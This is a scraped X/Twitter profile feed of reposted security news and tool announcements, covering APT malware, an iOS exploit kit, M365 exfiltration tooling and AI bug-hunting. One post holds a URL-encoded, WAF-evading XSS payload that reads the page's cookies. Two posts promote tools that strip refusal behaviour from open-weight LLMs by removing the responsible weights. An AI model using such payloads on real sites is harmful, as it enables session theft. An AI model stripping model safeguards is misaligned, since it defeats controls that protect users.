Aaron D
@DigitalResidue
Followers
281
Following
1K
Media
23
Statuses
5K
Executing random garbage as code, and hoping that it jumps to a location within a segment that we control. (っ◔◡◔)っ🐚
Boston, MA
Joined September 2012
We partnered with Mozilla to test Claude's ability to find security vulnerabilities in Firefox. Opus 4.6 found 22 vulnerabilities in just two weeks. Of these, 14 were high-severity, representing a fifth of all high-severity bugs Mozilla remediated in 2025.
398
1K
13K
𝕏 | Censorship in action. My post was blocked as “Hateful Conduct” - even though it was just a list of public information, with no comment, no opinion. Users can’t interact, and the reason? Completely unclear.
36
76
265
If true, this is VERY interesting! Iranian APT using deno for second stage execution. We caught this intrusion and will be making the data available in our Threat Hunting Labs that will be released next week! - @ThruntingLabs
@1ZRR4H @Kostastsale @ffforward @vxunderground After that detection from Microsoft, now @threatintel also connects the same Deno using malware samples to MuddyWater APT... Also in the same article, they suggest that some "Donald Gay" signed samples we have seen in recent weeks are also related to MuddyWater... 🤷♂️
0
7
48
This is a very clever technique: Task Injection in AI Agents. https://t.co/pr91ApL8zO
bughunters.google.com
Check this post to find out what a Task Injection attack is, how this type of attack differs from Prompt Injection, and how it is particularly relevant to AI agents designed for a wide range of...
0
23
152
Cybersecurity vanguards unmask a new PlugX C2 labyrinth. Discover how Mustang Panda and RedDelta use Evoxt and Cloudflare to shroud their 2026 global espionage. https://t.co/8zt4tIfYH1
0
0
0
I was bored to type the same commands each time I started a new internal pentest. So here comes KingCastle. This script does not perform any attacks, consider it as a cheat sheet, to quickly see low hanging fruits. https://t.co/tFUZkzYdXC
1
50
249
M365Pwned: Red Team tooling for Microsoft 365 exploitation via Microsoft Graph API. Two WinForms GUI tools for enumerating, searching, and exfiltrating data from M365 environments using application-level OAuth tokens — no user interaction required. https://t.co/AIob5jp0V0
2
48
200
Left Claude Code running on a VPS overnight. Woke up to a legit SSRF finding, no AI slop😳 If you're still judging AI capabilities based on anything before Opus 4.5, you're in for a surprise. AI-automated bug reports will be the new low-hanging fruit, just like sub takeover was.
15
11
246
Someone open-sourced a tool that REMOVES LLM CENSORSHIP in 45 minutes 🤯 It’s called Heretic. Instead of fighting with complex prompts to bypass safety filters, you run one single command and it permanently deletes the model's ability to refuse a prompt. • Fully automatic
49
297
2K
Telegram Increasingly Used to Sell Access, Malware and Stolen Logs
hackread.com
Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
0
11
49
Another day, another WAF bypassed, XSS reported and bounty awaited. param=%22%7D%2C%22*%22)%3Bvar%20d%3DglobalThis%5B%22docu%22%2B%22ment%22%5D%3Bd.body.innerText%3Dd%5B%22do%22%2B%22main%22%5D%2B%22%3A%20%22%2Bd%5B%22coo%22%2B%22kie%22%5D%3B%2F%2F COME ON WAF's... who's
7
77
540
广州大学方班BinX战队的自动化渗透测试Agent 新版本发布了!! LuaN1aoAgent也是去年黑客松上表现出色的一款智能体,基于DeepSeek V3.2构建,目前在Xbow基准测试中,它完全自主地实现了90%的成功率,平均每次漏洞利用的成本仅为0.09美元。 其优点在架构设计上:
6
76
346
🔥Recon Nexus scans domains for exposed files and common vulnerabilities. It also integrates external tools for deeper reconnaissance and OSINT. Do your recon faster on webapps quickly, with tools all in one. link: https://t.co/uOsidXV1uS
4
45
212
Windows 11 is sending your gameplay data to Microsoft in real time. It's called "Connected User Experiences and Telemetry" and it uses your CPU WHILE you game stealing FPS and resources from your game. Services.msc → find "Connected User Experiences and Telemetry" → Disable
337
3K
27K
someone built a tool that REMOVES censorship from ANY open-weight LLM with a single click 13 abliteration methods, 116 models, 837 tests, and it gets SMARTER every time someone runs it its called OBLITERATUS it finds the exact weights that make the model refuse and surgically
161
1K
10K
I was able to recover one of the implants of the Coruna iOS Exploit Kit
10
64
616
In Active Directory, there is a method that’s been around for many years which changes the password last set date but not the actual password. This is what I call a “fake password change” since the account appears to have a recent password when scanning for old passwords based on
6
156
983
A full iOS exploit toolkit, "Coruna," has been found in the wild, hacking iPhones that visited infected websites, used by Russian spies targeting Ukrainians and thieves targeting Chinese crypto holders. And it may have been created for the US government.
wired.com
A highly sophisticated set of iPhone hijacking techniques has likely infected tens of thousands of phones or more. Clues suggest it was originally built for the US government.
8
313
722